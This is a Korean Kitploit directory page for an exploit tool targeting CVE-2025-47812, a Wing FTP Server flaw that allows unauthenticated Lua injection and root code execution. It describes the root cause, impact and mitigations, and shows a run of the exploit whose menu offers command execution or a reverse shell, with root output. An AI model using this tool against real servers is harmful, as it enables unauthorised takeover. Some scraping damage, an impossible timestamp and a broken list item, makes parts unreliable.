Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
도구/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationRemote Access ToolPayload Development
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ CVE-2025-47812 – Wing FTP Server의 치명적 RCE 🛡️

🔎 개요:

CVE-2025-47812는 Wing FTP Server 7.4.4 이전 버전에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점입니다. 보안 연구원에 의해 발견되었으며, 실제 환경에서 적극적으로 악용되고 있는 것으로 확인되었습니다.


🧱 근본 원인:

이 취약점은 Wing FTP Server의 인증 로직, 특히 username 매개변수의 널 바이트(\0) 처리 방식에 존재합니다.

공격자는 username 필드를 통해 임의의 Lua 코드를 주입할 수 있으며, 서버는 이를 세션 파일에 기록합니다. 이후 이 세션 파일이 처리될 때 주입된 Lua 코드가 실행되어 공격자가 시스템 수준의 명령을 실행할 수 있게 됩니다.


🚨 영향:

  • 심각도: CVSS 점수 10.0 (치명적)
  • 필요한 접근 권한: 인증되지 않았거나 익명의 접근으로 충분합니다
  • 악용 현황: 활발한 악용이 확인됨
  • 획득 권한: 코드가 SYSTEM(Windows) 또는 root(Linux/macOS) 권한으로 실행됩니다
  • 영향을 받는 플랫폼: Windows, Linux, macOS

🔧 완화 조치:

  • 즉시 Wing FTP Server 버전 7.4.4 이상으로 업데이트하세요.
  • 공개적으로 노출된 FTP 서버가 신뢰할 수 없는 네트워크에 을 노출하지 않도록 하세요.
도구 다운로드
/loginok.html
  • 비정상적인 사용자 이름이나 Lua 코드 주입이 있는지 로그를 모니터링하세요.
  • FTP 서비스를 내부 인프라와 분리하기 위해 네트워크 분할을 구현하세요.

  • 💀 익스플로잇:

    root@kitploit:~
    ┌──(kali㉿kali)-[~]
    └─$ sudo python3 CVE-2025-47812.py
    ============================================================
       CVE-2025-47812 - Wing FTP Server RCE Exploit
    ============================================================
    Target URL (e.g., http://localhost:5466): http://10.10.10.10
    Username (e.g., anonymous): anonymous
    1) Run Command
    2) Get Reverse Shell
    Your choice (1 or 2): 1
    Command to execute (default: whoami): id
    [*] Trying to get UID... Payload: id
    [*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
    [*] Sending /dir.html request...
    [*] HTTP 200
    ------ Response Start ------
    uid=0(root) gid=0(root) groups=0(root)
    <?xml version="1.0" encoding="UTF-8" ?>
    <alldata><nowdir><![CDATA[/]]></nowdir>
    <dirdata>
    </dirdata>
    <nowquota>0</nowquota>
    <maxquota>0</maxquota>
    <readfile>1</readfile>
    </alldata>
    
    
    ------ Response End ------
    

    ⚠️ 면책 조항

    이 익스플로잇은 교육 목적으로만 제공됩니다. 명시적 테스트 허가를 받은 시스템에서만 책임감 있게 사용하십시오. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.